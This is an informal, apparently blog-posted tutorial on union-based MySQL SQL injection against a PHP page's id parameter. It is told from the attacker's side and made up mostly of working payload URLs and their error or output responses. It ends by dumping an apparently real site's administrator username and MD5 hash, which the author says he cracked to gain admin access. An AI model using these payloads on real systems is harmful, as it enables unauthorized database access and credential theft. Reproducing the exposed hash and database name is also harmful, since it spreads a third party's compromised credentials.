For free time that I don’t have

Hi , the reason for reading my article :

1. Fast way to find template of injection

Injection is type of attacks that an attacker may be using for getting access from target , many kind of SQL injection attacks are available even would be chosen against victim by according to the formation of Database ,  such as “MySQL , MsSQL , Oracle …..”, I’ve chosen MySQL … in future I’ll analyze by using vulnerable PHP code ….

Fortunately , if an error messages are returned from the application ( the default PHP behavior ) the attacker can determine the entire structure of the database , read any value that can be read by the account the PHP application is using to connect to the MySQL Server.
Making error by using special characters like ‘ and -1′ , The following example shows you how can it be :

http://target/forgotobj.php?id=1'

• This provides an error :

You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '\" at line 1

Using SQL query “Union Select” for finding columns number which produces no error , the syntax has been displayed below :

http://target.com/forgotobj.php?id=-1/**/union/**/select/**/1,2,3,4,5–

If the guess of columns number is right an error won’t be shown instead of somethings like 2 or 3 on web site smartly could be replaced with anything …

http://terget/forgotobj.php?id=-1/**/union/**/select/**/1,current_user(),3,4,5--

• Will see current user with which number that was replaced with , for example :

User@localhost

In another word , column name should be replaced with a numbers shown on the web site by queries !

Hacker gonna find tables name and related columns name , in basic Mysql injection he guesses the table could be somewhat looks like “users” , “user” , “admin” , “members ” - In advanced mode here are some professional ways ( not very ) to find it out I’m not gonna explain them right now … Continue :

target/forgotobj.php?id=-1/**/union/**/select/**/1,2,3,4,5/**/from/**/users

• A table name which doesn’t exist will cause the application to return an error :

Table 'taxirani_taxi.users' doesn't exist

• In another test :

id=-1/**/union/**/select/**/1,2,3,4,5/**/from/**/member

• Making no error meant It has been done , The column name is similar to spoken way …. Examples : “user” , “username” ,”pass” , “password”

id=-1/**/union/**/select/**/1,username,password,4,5/**/from/**/member

• Eventually the attacker arrives at the following user and password of administrator :

admin
0b953853de8bb3d65a51e08844c4c767

For md5 it’s not imba think you know that , md5 hashes have been made by range “0-9,a,b,c,d,e,f” and must be 32 bytes ! cracking is your job I used my php md5 cracker , and I got administrator !

Everything I said can be found in the tutorial clip I’ve recorded  before :p loading here . If I get time and wanna write about Mssql injection I’m sure will tell a powerful and complete tutorial from beginning to end of that but I recommend you to refer Mormoroth and his damn movies .